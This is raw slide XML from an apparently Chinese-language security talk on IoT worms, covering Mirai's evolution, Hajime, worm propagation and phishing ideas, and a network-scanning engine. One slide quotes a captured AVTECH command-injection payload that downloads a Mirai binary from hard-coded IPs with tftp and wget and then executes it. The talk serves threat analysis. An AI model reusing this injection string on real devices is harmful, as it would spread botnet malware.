                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8862" y="20894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8841" y="20923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8773" y="20955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8780" y="20984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8836" y="21016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8929" y="21026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9001" y="21006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9065" y="20984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9116" y="20965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9168" y="20933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9152" y="20881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9131" y="20843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9100" y="20791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9039" y="20740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8976" y="20718"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4457" y="20759"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4472" y="20801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4530" y="20820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4535" y="20830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4596" y="20862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4685" y="20904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4742" y="20881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4685" y="20843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4617" y="20811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4544" y="20779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4457" y="20759"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8499" y="20894"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8495" y="20933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8483" y="20965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8396" y="20965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8313" y="20955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8344" y="20984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8405" y="21016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8483" y="21006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8566" y="21026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8561" y="20984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8556" y="20933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8499" y="20894"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="AB1802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" name="一些背景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一些背景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进化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进化</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="更多的内网渗透技巧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0763" indent="-270763" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:defRPr sz="2391"/>
            </a:pPr>
            <a:r>
              <a:t>更多的内网渗透技巧</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="541527" lvl="1" indent="-270763" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:defRPr sz="2391"/>
            </a:pPr>
            <a:r>
              <a:t>如：提权、感染域控服务器、一些防御Bypass、MITM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="270763" indent="-270763" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:defRPr sz="2391"/>
            </a:pPr>
            <a:r>
              <a:t>更多的猥琐钓鱼思路</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="541527" lvl="1" indent="-270763" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:defRPr sz="2391"/>
            </a:pPr>
            <a:r>
              <a:t>如：DNS劫持、感染现有Office文档</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="270763" indent="-270763" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:defRPr sz="2391"/>
            </a:pPr>
            <a:r>
              <a:t>更多的传播路径</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="541527" lvl="1" indent="-270763" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:defRPr sz="2391"/>
            </a:pPr>
            <a:r>
              <a:t>如：路由器、打印机、Wi-Fi、U盘、手机、内网开发运维环境、内网OA/ERP等</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="270763" indent="-270763" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:defRPr sz="2391"/>
            </a:pPr>
            <a:r>
              <a:t>只要是工业成熟级的技巧都可以组合运用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="541527" lvl="1" indent="-270763" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:defRPr sz="2391"/>
            </a:pPr>
            <a:r>
              <a:t>现代的带宽、硬件性能越来越能满足大体积的蠕虫个体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悬挂式滑翔"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1633977" y="3534167"/>
            <a:ext cx="9736846" cy="3728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0010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="728" y="10999"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="728" y="10999"/>
                  <a:pt x="3523" y="9164"/>
                  <a:pt x="4947" y="12874"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5366" y="12532"/>
                  <a:pt x="5815" y="12287"/>
                  <a:pt x="6286" y="12155"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8934" y="17319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8736" y="18828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8736" y="18550"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8736" y="18261"/>
                  <a:pt x="8646" y="18025"/>
                  <a:pt x="8535" y="18025"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8424" y="18025"/>
                  <a:pt x="8334" y="18261"/>
                  <a:pt x="8334" y="18550"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8334" y="21079"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8334" y="21368"/>
                  <a:pt x="8424" y="21600"/>
                  <a:pt x="8535" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8646" y="21600"/>
                  <a:pt x="8736" y="21368"/>
                  <a:pt x="8736" y="21079"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8736" y="20205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12865" y="20205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12865" y="21079"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12865" y="21368"/>
                  <a:pt x="12954" y="21600"/>
                  <a:pt x="13065" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13176" y="21600"/>
                  <a:pt x="13266" y="21368"/>
                  <a:pt x="13266" y="21079"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13266" y="18550"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13266" y="18261"/>
                  <a:pt x="13176" y="18025"/>
                  <a:pt x="13065" y="18025"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12954" y="18025"/>
                  <a:pt x="12865" y="18261"/>
                  <a:pt x="12865" y="18550"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12865" y="18828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12668" y="17319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15316" y="12155"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15786" y="12287"/>
                  <a:pt x="16236" y="12532"/>
                  <a:pt x="16655" y="12874"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18185" y="9164"/>
                  <a:pt x="20872" y="10999"/>
                  <a:pt x="20872" y="10999"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="10010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10800" y="0"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7229" y="12049"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8047" y="12092"/>
                  <a:pt x="8812" y="12476"/>
                  <a:pt x="9483" y="13117"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9035" y="16538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6740" y="12062"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6901" y="12043"/>
                  <a:pt x="7064" y="12040"/>
                  <a:pt x="7229" y="12049"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14371" y="12049"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="14536" y="12040"/>
                  <a:pt x="14699" y="12043"/>
                  <a:pt x="14860" y="12062"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12565" y="16538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12117" y="13117"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12788" y="12476"/>
                  <a:pt x="13553" y="12092"/>
                  <a:pt x="14371" y="12049"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9764" y="13404"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10148" y="13829"/>
                  <a:pt x="10496" y="14339"/>
                  <a:pt x="10800" y="14922"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11104" y="14339"/>
                  <a:pt x="11452" y="13829"/>
                  <a:pt x="11836" y="13404"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12625" y="19420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8976" y="19420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9764" y="13404"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="AB1802">
              <a:alpha val="30382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2" name="对抗思路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对抗思路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唯快不破"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="5689600"/>
            <a:ext cx="10464800" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>唯快不破</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="对抗首先要解决及时看见的问题"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="4089400"/>
            <a:ext cx="10464800" cy="774701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>对抗首先要解决及时看见的问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="眼睛"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5742811" y="3171255"/>
            <a:ext cx="1519177" cy="792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6707" y="0"/>
                  <a:pt x="2918" y="3569"/>
                  <a:pt x="407" y="9790"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407" y="11810"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2918" y="18032"/>
                  <a:pt x="6707" y="21600"/>
                  <a:pt x="10800" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14893" y="21600"/>
                  <a:pt x="18680" y="18032"/>
                  <a:pt x="21192" y="11810"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21192" y="9790"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18680" y="3569"/>
                  <a:pt x="14893" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8667" y="3677"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7382" y="5094"/>
                  <a:pt x="6517" y="7753"/>
                  <a:pt x="6517" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6517" y="13847"/>
                  <a:pt x="7382" y="16502"/>
                  <a:pt x="8667" y="17920"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6166" y="17019"/>
                  <a:pt x="3899" y="14543"/>
                  <a:pt x="2199" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3899" y="7057"/>
                  <a:pt x="6166" y="4577"/>
                  <a:pt x="8667" y="3677"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12931" y="3677"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="15432" y="4577"/>
                  <a:pt x="17699" y="7057"/>
                  <a:pt x="19400" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17699" y="14543"/>
                  <a:pt x="15432" y="17019"/>
                  <a:pt x="12931" y="17920"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14216" y="16502"/>
                  <a:pt x="15081" y="13847"/>
                  <a:pt x="15081" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15081" y="7753"/>
                  <a:pt x="14216" y="5094"/>
                  <a:pt x="12931" y="3677"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12219" y="6169"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12805" y="6169"/>
                  <a:pt x="13279" y="7078"/>
                  <a:pt x="13279" y="8201"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13279" y="9324"/>
                  <a:pt x="12805" y="10234"/>
                  <a:pt x="12219" y="10234"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11634" y="10234"/>
                  <a:pt x="11159" y="9324"/>
                  <a:pt x="11159" y="8201"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11159" y="7078"/>
                  <a:pt x="11634" y="6169"/>
                  <a:pt x="12219" y="6169"/>
                </a:cubicBez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唯快不破"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="5689600"/>
            <a:ext cx="10464800" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>唯快不破</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="简单分享下我们的“全球网络空间探索引擎，内部代号（MOOZ/墨子）”架构思路"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="3752850"/>
            <a:ext cx="10464800" cy="1447801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>简单分享下我们的“全球网络空间探索引擎，内部代号（MOOZ/墨子）”架构思路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MOOZ架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MOOZ架构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="402" name="匿名网络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2420" indent="-312420" defTabSz="350520">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2760"/>
            </a:pPr>
            <a:r>
              <a:t>匿名网络</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="312420" indent="-312420" defTabSz="350520">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2760"/>
            </a:pPr>
            <a:r>
              <a:t>节点引擎</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="624840" lvl="1" indent="-312420" defTabSz="350520">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2760"/>
            </a:pPr>
            <a:r>
              <a:t>指纹引擎高效抓取IoT设备各种指纹数据，GO编写</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="624840" lvl="1" indent="-312420" defTabSz="350520">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2760"/>
            </a:pPr>
            <a:r>
              <a:t>漏洞引擎快速探测IoT设备远程漏洞，Python编写</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="624840" lvl="1" indent="-312420" defTabSz="350520">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2760"/>
            </a:pPr>
            <a:r>
              <a:t>多套爬虫脚本采集漏洞情报与入侵情报，Python编写</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="312420" indent="-312420" defTabSz="350520">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2760"/>
            </a:pPr>
            <a:r>
              <a:t>分离调度设计</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="312420" indent="-312420" defTabSz="350520">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2760"/>
            </a:pPr>
            <a:r>
              <a:t>ElesticSearch高性能存储及相关展示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MIrai的进化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MIrai的进化</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="405" name="2016.9.20爆发，9.30源码公布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9458" indent="-489458" defTabSz="549148">
              <a:spcBef>
                <a:spcPts val="4300"/>
              </a:spcBef>
              <a:defRPr sz="4324"/>
            </a:pPr>
            <a:r>
              <a:t>2016.9.20爆发，9.30源码公布</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="978916" lvl="1" indent="-489458" defTabSz="549148">
              <a:spcBef>
                <a:spcPts val="4300"/>
              </a:spcBef>
              <a:defRPr sz="4324"/>
            </a:pPr>
            <a:r>
              <a:t>一切细节：https://zh.wikipedia.org/wiki/Mirai_(恶意软件)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="489458" indent="-489458" defTabSz="549148">
              <a:spcBef>
                <a:spcPts val="4300"/>
              </a:spcBef>
              <a:defRPr sz="4324"/>
            </a:pPr>
            <a:r>
              <a:t>弱口令传播进化到IoT漏洞利用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="978916" lvl="1" indent="-489458" defTabSz="549148">
              <a:spcBef>
                <a:spcPts val="4300"/>
              </a:spcBef>
              <a:defRPr sz="4324"/>
            </a:pPr>
            <a:r>
              <a:t>10.26我们的监测发现与时俱进的漏洞利用痕迹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如针对AVTECH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如针对AVTECH的</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Account.User1.Username=admin…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349149" y="2705100"/>
            <a:ext cx="12293601" cy="635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Account.User1.Username=admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:t>Account.User1.Password=admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:t>Account.User1.Level=SUPERVISOR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:t>Account.User1.Lifetime=INFINITE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:t>Account.User2.Username=aaaa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:t>Account.User2.Password=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CA031B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;tftp -l /dev/dvrHelper -r mirai.arm -g 151.80.99.84 || wget http://5.206.225.122/bins/mirai.arm -O /dev/dvrHelper; chmod 777 /dev/dvrHelper; cd /dev; ./dvrHelper 2&gt;&amp;1;/bin/busybox MIRAI 2&gt;&amp;1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:t>Account.User2.Level=SUPERVISOR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:t>Account.User2.Lifetime=1 HOUR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IoT漏洞研究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IoT漏洞研究</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="固件调试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4904" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>固件调试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="749808" lvl="1" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>固件提取、Binwalk、QEMU、GDB、IDA、Builtroot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>协议分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="749808" lvl="1" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>Wireshark、Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>端口分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="749808" lvl="1" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>Nmap、官方文档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IoT漏洞研究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IoT漏洞研究</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414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1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0050" y="3632200"/>
            <a:ext cx="9664700" cy="4495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深度剖析了解目标蠕虫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深度剖析了解目标蠕虫</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="是否有Kill switch开关来控制传播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是否有Kill switch开关来控制传播</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>勒索的文件是否可以恢复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全球网络空间基础参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全球网络空间基础参数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="IPv4 IP总量：4,294,967,296 ~= 43亿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IPv4 IP总量：4,294,967,296 ~= 43亿</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>IPv4空间里有大量地址未被探测到（历史）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>这个比例可能是2/3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良性蠕虫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良性蠕虫</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Hajim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3422" indent="-463422" defTabSz="519937">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:defRPr sz="4093"/>
            </a:pPr>
            <a:r>
              <a:t>Hajime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="926845" lvl="1" indent="-463422" defTabSz="519937">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:defRPr sz="4093"/>
            </a:pPr>
            <a:r>
              <a:t>2016.10.5应该是第一次被发现</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="926845" lvl="1" indent="-463422" defTabSz="519937">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:defRPr sz="4093"/>
            </a:pPr>
            <a:r>
              <a:t>2017.4.27被发现对抗Mirai的行为，感染了30万</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="926845" lvl="1" indent="-463422" defTabSz="519937">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:defRPr sz="4093"/>
            </a:pPr>
            <a:r>
              <a:t>运用到了P2P技术</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="926845" lvl="1" indent="-463422" defTabSz="519937">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:defRPr sz="4093"/>
            </a:pPr>
            <a:r>
              <a:t>会屏蔽23、7547、5555、5358这些端口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Haji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Hajime</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424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2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9600" y="3467100"/>
            <a:ext cx="9245600" cy="482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一个有趣的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一个有趣的点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Mirai、Hajime、比特币，都和日本有关，这些人想做什么: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1352" indent="-411352" defTabSz="461518">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3634"/>
            </a:pPr>
            <a:r>
              <a:t>Mirai、Hajime、比特币，都和日本有关，这些人想做什么:)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="822705" lvl="1" indent="-411352" defTabSz="461518">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3634"/>
            </a:pPr>
            <a:r>
              <a:t>Mirai日语意思是未来</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="822705" lvl="1" indent="-411352" defTabSz="461518">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3634"/>
            </a:pPr>
            <a:r>
              <a:t>Hajime日语意思是开始</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="822705" lvl="1" indent="-411352" defTabSz="461518">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3634"/>
            </a:pPr>
            <a:r>
              <a:t>赚钱的目的性不是很强，更多是实验</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="822705" lvl="1" indent="-411352" defTabSz="461518">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3634"/>
            </a:pPr>
            <a:r>
              <a:t>是帝国也是战场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END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END</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
